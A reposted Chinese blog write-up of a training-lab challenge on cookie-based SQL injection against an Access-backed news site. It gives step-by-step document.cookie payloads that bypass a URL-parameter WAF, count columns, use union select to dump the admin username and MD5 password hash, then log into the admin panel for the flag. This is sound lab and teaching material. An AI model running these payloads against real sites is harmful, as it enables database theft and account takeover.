首页 > 数据库技术 > 详细

封神台-Access注入之Cookie注入

时间:2021-09-06 06:09:52      阅读:11      评论:0      收藏:0      [点我收藏+]

Access注入之Cookie注入

技术分享图片

我们进入新闻页面,随便点击一条新闻进入

技术分享图片

我们通过测试发现URL传参是有检测的,有WAF进行拦截,于是我们换一种思路,测试一下Cookie注入

我们通过测试Cookie传参id值

判断注入存在

设置Cookie:
document.cookie="id="+escape("171")

访问网址:
http://kypt8004.ia.aqlab.cn/shownews.asp

页面返回的是id=171的页面,可以证明id传参是有效的,可能存在Cookie注入

继续测试证明注入存在:
document.cookie="id="+escape("171 and 1=1") #页面正常
document.cookie="id="+escape("171 and 1=2") #页面异常

判断字段数

document.cookie="id="+escape("171 order by 10") #页面正常
document.cookie="id="+escape("171 order by 11") #页面异常

得出字段数为10

判断显错点

这里有一点需要注意的是Access数据库与MySQL数据库不同
  Access数据库进行查询时必须填写正确的表名才能查询
  
document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin")

得出显错点为2,3位

查询数据

document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")

得出username=admin&password=b9a2a2b5dffb918c

我们注意到这个password是个md5值,于是我们去解密以下
得到密码为:welcome

于是我们去登陆网站后台

后台地址:http://kypt8004.ia.aqlab.cn/admin/Login.asp

登陆后得到最终flag为:zkz{welcome-control}

技术分享图片

封神台-Access注入之Cookie注入

原文:https://www.cnblogs.com/gaojia-hackerone/p/15226822.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!